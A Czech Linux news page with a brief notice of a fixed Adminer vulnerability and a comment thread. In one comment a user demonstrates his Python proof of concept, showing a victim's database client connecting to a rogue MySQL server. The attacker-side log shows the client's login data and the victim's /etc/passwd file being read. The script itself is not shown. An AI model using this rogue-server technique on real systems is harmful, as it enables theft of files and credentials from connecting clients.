abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 22:11 | IT novinky

    Google oznámil konec své herní platformy Stadia. Servery budou vypnuty 18. ledna 2023. Více ve FAQ. Google představil Stadiu v březnu 2019. Pro hráče z Česka a Slovenska byla Stadia dostupná od prosince 2020.

    Ladislav Hagara | Komentářů: 0
    dnes 15:33 | Komunita

    Před pěti dny pouze kostka, dnes již na Apple M1 GPU pomocí ovladače pro Linux napsaného v Rustu běží Neverball, Firefox s YouTube a framework pro VTubing Inochi2D v GNOME na Waylandu (YouTube, Twitter).

    Ladislav Hagara | Komentářů: 4
    dnes 14:00 | Komunita

    Bylo rozhodnuto, že se vývoj kolekce softwarových nástrojů GNU Toolchain přesune ze Sourceware do Linux Foundation. Do GNU Toolchain patří GNU Compiler Collection (gcc), GNU Make, GNU C Library (glibc), GNU Binutils, GNU Bison, GNU M4, GNU Debugger (gdb) a GNU Autotools. Pod Linux Foundation vznikne nový projekt GNU Toolchain Infrastructure (GTI). Na infrastruktuře Linux Foundation probíhá vývoj Linuxu a mnoha dalších open source projektů.

    Ladislav Hagara | Komentářů: 0
    dnes 13:22 | Nová verze

    Byla vydána nová stabilní verze 6.4 multiplatformního frameworku a GUI toolkitu Qt. Podrobný přehled novinek v poznámkách k vydání. Zdůraznit lze nové moduly Qt HTTP Server a Qt Quick 3D Physics. Opět je k dispozici modul Qt TextToSpeech. V modulu Qt Quick Dialogs je nově ColorDialog.

    Ladislav Hagara | Komentářů: 0
    dnes 12:33 | Humor

    Projekt ButtFish odpoví na otázku, zda je možné v šachu podvádět pomocí hračky pro dospělé a morseovky. Využívá open source framework Buttplug.

    Ladislav Hagara | Komentářů: 5
    dnes 03:00 | IT novinky

    Amazon včera představoval své novinky (YouTube). Začal novým 10,2 palcovým Kindlem Kindle Scribe, tj. prvním Kindlem pro čtení i psaní. Následovalo představení zařízení pro monitorování spánku Halo Rise, chytrého reproduktoru s 3D audiem a Alexou Echo Studio, …

    Ladislav Hagara | Komentářů: 0
    včera 20:11 | Humor

    Stavíte retro počítač nebo Vám na počítači chybí zvuk starého pevného disku? Pomoci může HDD Clicker (YouTube).

    Ladislav Hagara | Komentářů: 16
    včera 16:11 | Nová verze

    Adaptable Linux Platform je nová distribuce od SUSE, která má v budoucnu nahradit SLE (openSUSE Leap); navazuje na stávající SLE Micro. Základem je „neměnný“ HostOS, aplikace běží v kontejnerech. Nyní jsou dostupné obrazy prototypu nazvaného „Les Droites“. Zatím má podporovat především šifrování disku a kontejnerizaci, ale bez větší integrace.

    Fluttershy, yay! | Komentářů: 3
    včera 14:33 | Komunita

    Mesa umí skrze VA-API hardwarovou podporu H.264, H.265 a VC-1. Ve Fedora Linuxu ale musí být tato podpora z důvodů softwarových patentů zakázána.

    Ladislav Hagara | Komentářů: 23
    včera 08:00 | IT novinky

    Intel na dvoudenní akci Intel Innovation 2022 představuje své novinky. První den představil 13. generaci procesorů Intel Core. Nejvýkonnější Intel Core i9-13900K má 24 jader (8 výkonných a 16 úsporných) a 32 vláken a může běžet až na 5,8 GHz. Jeho cena je 589 dolarů.

    Ladislav Hagara | Komentářů: 23
    Bavíte se s chatboty na webových stránkách e-shopů, bank, mobilních operátorů atd.?
     (22%)
     (5%)
     (49%)
     (25%)
    Celkem 288 hlasů
     Komentářů: 0
    Rozcestník


    Bezpečnostní chyba v Admineru

    Byly zveřejněny informace o bezpečnostní chybě v nástroji pro správu databází v jednom PHP souboru Adminer. Chyba je už půl roku opravena. Stačí Adminer aktualizovat.

    21.1.2019 16:55 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    21.1.2019 20:27 Odin1918 | skóre: 6 | blog: Valhalla
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
    Vrana k vrane seda. :-( Necht php zhyne a upadne v zapomneni.
    Jendа avatar 22.1.2019 09:51 Jendа | skóre: 77 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
    Příloha:
    Z čistě edukativních důvodů, a určitě ne proto abych krmil internetového trolla a ukázal mu, že to nesouvisí s PHP, nýbrž se stejný problém vyskytuje i v jiných programovacích jazycích, jsem ten exploit přepsal do Pythonu.

    Použití: Jako útočník spustíme attacker.py.

    Oběť:
    Python 3.7.2 (default, Jan  3 2019, 02:55:40) 
    [GCC 8.2.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import MySQLdb
    >>> connection = MySQLdb.Connect(host='127.0.0.1', user='nsa', passwd='litomerice', db='catchmeifyoucan')
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "/usr/lib/python3/dist-packages/MySQLdb/__init__.py", line 86, in Connect
        return Connection(*args, **kwargs)
      File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 266, in __init__
        self.autocommit(autocommit)
      File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 272, in autocommit
        _mysql.connection.autocommit(self, on)
    _mysql_exceptions.OperationalError: (2013, 'Lost connection to MySQL server during query')
    >>> 
    
    Útočník vidí:
    ACCEPT:  ('127.0.0.1', 40422)
    > server greeting
    plen 204
    received data: b'\x01\x8c\xa2\x9f\x00\x00\x00\x00@\x08\x00\x00\x00\x00\x00\x00\x00
    \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00nsa\x00\x14\xd7\xfd
    \xdbj\x11\xe5\x8f\x14\x89\xeaa\x8a\xaf\xf2\xcc\x91\xea\xf7\xe0\xc4catchmeifyoucan\x00mysql_native_password\x00k\x03_os\x05Linux\x0c_client_name\nlibmariadb\x04_pid
    \x0519516\x0f_client_version\x053.0.8\t_platform\x06x86_64\x0c_server_host\t127.0.0.1'
    > auth accept
    plen 18
    received data: b'\x00\x03SET autocommit=0'
    > exploit
    plen 3632
    received data: b'\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:
    /usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys: [...]
    Testováno na aktuálních verzích v Debianu Unstable, je mi úplně fuk že to je binárně nekompatibilní s okolním světem, a taky je mi fuk, že to u oběti hodí exception a tudíž pokud to použijete v produkci, tak si toho všimne. Je to Poc.
    Bedňa avatar 23.1.2019 00:05 Bedňa | skóre: 34 | blog: Žumpa | Horňany
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
    Pekné :-)
    KERNEL ULTRAS video channel >>>
    Jendа avatar 22.1.2019 08:51 Jendа | skóre: 77 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Admineru
    Komu se to nechce hledat tak tady je ten commit.

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.